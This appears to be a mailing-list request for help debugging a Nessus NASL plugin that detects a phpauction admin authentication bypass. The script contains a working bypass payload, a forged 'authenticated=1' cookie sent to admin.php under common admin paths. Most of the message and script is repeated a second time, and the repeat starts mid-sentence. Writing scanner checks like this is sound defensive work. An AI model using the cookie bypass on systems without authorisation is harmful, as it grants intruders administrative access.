I tried to write a NASL script for a bug in phpauction that I found early this
year (http://www.securityfocus.com/bid/12069), but the script does not work
completely.
I sniffed the connection while running the script: it successfully uses the
bypass and visits every given directory, but unfortunately it does not
recognize that it has successfully logged in.
Would some of you be so kind as to have a look at it? Thanks in advance.
Toby
# The script code starts here
include("http_func.inc");
include("http_keepalive.inc");
port = get_http_port(default:80);
if(!get_port_state(port))exit(0);
dirs = make_list( "/phpauction/admin", "/admin", "/auction/admin",
"auktion/admin", cgi_dirs());
foreach dir (dirs)
{
req = http_get(item:dir +"/admin.php", port:port);
res = http_keepalive_send_recv(port:port, data:req);
if( res == NULL ) exit(0);
if( "Passwort " >< res || "Password" >< res )
{
idx = stridx(req, string("\r\n\r\n"));
req = insstr(req, '\r\nCookie: authenticated=1;', idx, idx);
res = http_keepalive_send_recv(port:port, data:req);
if("Installation" >< res)
{
security_hole(port);
}
exit(0);
}
}
# eof
year (http://www.securityfocus.com/bid/12069), but the script does not work
completely.
I sniffed the connection while running the script: it successfully uses the
bypass and visits every given directory, but unfortunately it does not
recognize that it has successfully logged in.
Would some of you be so kind as to have a look at it? Thanks in advance.
Toby
# The script code starts here
include("http_func.inc");
include("http_keepalive.inc");
port = get_http_port(default:80);
if(!get_port_state(port))exit(0);
dirs = make_list( "/phpauction/admin", "/admin", "/auction/admin",
"auktion/admin", cgi_dirs());
foreach dir (dirs)
{
req = http_get(item:dir +"/admin.php", port:port);
res = http_keepalive_send_recv(port:port, data:req);
if( res == NULL ) exit(0);
if( "Passwort " >< res || "Password" >< res )
{
idx = stridx(req, string("\r\n\r\n"));
req = insstr(req, '\r\nCookie: authenticated=1;', idx, idx);
res = http_keepalive_send_recv(port:port, data:req);
if("Installation" >< res)
{
security_hole(port);
}
exit(0);
}
}
# eof